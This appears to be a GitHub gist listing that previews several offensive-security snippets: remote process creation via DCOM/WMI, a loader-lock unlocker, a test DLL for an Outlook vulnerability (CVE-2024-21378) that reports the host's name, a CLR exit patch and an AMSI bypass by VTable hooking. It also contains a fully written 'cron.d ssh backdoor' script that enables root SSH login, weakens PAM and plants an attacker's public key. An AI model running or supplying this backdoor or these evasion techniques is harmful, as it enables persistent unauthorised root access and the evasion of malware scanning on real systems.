@jborean93
jborean93 / New-ScheduledTaskSession.ps1
Last active September 21, 2024 10:58
Creates a PSSession that targets a scheduled task process
# Copyright: (c) 2024, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
Function New-ScheduledTaskSession {
<#
.SYNOPSIS
Creates a PSSession for a process running as a scheduled task.
.DESCRIPTION
Creates a PSSession that can be used to run code inside a scheduled task
@EvanMcBroom
EvanMcBroom / unlock_ldr.cpp
Last active September 1, 2024 05:17
Example code that may be used in DllMain to unlock the loader lock.
// Copyright (C) 2023 Evan McBroom
// Originally authored October 19th, 2023.
//
// Geoff Chappell first documented the format of the loader lock cookie on November 26th, 2008.
// His work is applied here to unlock the loader lock without knowing the original cookie that
// LdrLockLoaderLock returned. This same example code may be safely used in DllMain to unlock
// the loader lock and execute code that would otherwise deadlock the loader.
// Sources:
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/lockloaderlock.htm
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/unlockloaderlock.htm
@EvanMcBroom
EvanMcBroom / exec_remote_process.cpp
Last active September 1, 2024 05:14
Examples of using an impersonation token instead of explicit credentials to create a process on a remote host via DCOM and MS-WMI.
// Copyright (C) 2024 Evan McBroom
#include <Windows.h>
#include <iostream>
#include <vector>
#include <WbemCli.h>
#include <atlbase.h>
#include <iomanip>
// The modified, compiled IDL file from:
@TheWover
TheWover / SystemProcessInformation.cpp
Last active September 4, 2024 07:40
Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Author: TheWover
//
#include <iostream>
#include <string>
#include "ntdefs.h"
bool demoSystemProcessInformation(bool full)
{
@Homer28
Homer28 / test_dll.c
Last active July 13, 2024 01:59
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@grahamhelton
grahamhelton / gist:b78f9238544e63c0046b4a20e3aed188
Last active September 12, 2024 12:06
Cron.d ssh backdoor
# Place our backdoor script into /tmp/ssh.sh
# This will be run by cron
# Run one line at a time. Do not try to paste entire command in at once....
cat << EOF > /tmp/ssh.sh
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p /root/.ssh && touch /root/.ssh/authorized_keys ; echo "ENTER YOUR PUBLIC KEY HERE" >> /root/.ssh/authorized_keys ; /usr/sbin/service ssh restart
# Then type EOF and press enter
# Ensure the script has execute permissions
chmod +x /tmp/ssh.sh
@WKL-Sec
WKL-Sec / FuncAddrResolver.cpp
Created March 6, 2024 13:00
Dynamically retrieves the OpenProcess function address by parsing the kernel32.dll export table using Inline Assembly.
// White Knight Labs - Offensive Development
// Inline Assembly - Get Function Address
#include <iostream>
#include <windows.h>
// Function definition
void* GetFunctionAddress(const char* functionName) {
void* getFunctionAddr = nullptr;
@nullenc0de
nullenc0de / block_sec.sh
Created February 16, 2024 16:49
Looks up IP addresses to companies and blocks them via IP tables.
#!/bin/bash
apt install golang -y
GOROOT="/usr/local/go"
PATH="${PATH}:${GOROOT}/bin"
GOPATH=$HOME/go
PATH="${PATH}:${GOROOT}/bin:${GOPATH}/bin"
go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
@odzhan
odzhan / proc_env_exit.cpp
Last active June 12, 2024 05:01
Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Based on :
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;)
@rxwx
rxwx / AmsiContextHook.cpp
Created November 30, 2023 17:04
Bypass AMSI on Windows 11 by hooking the AMSI context VTable on the heap with a ROP gadget. Look ma, no code patches!
#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"
/**
* For the debug build we want: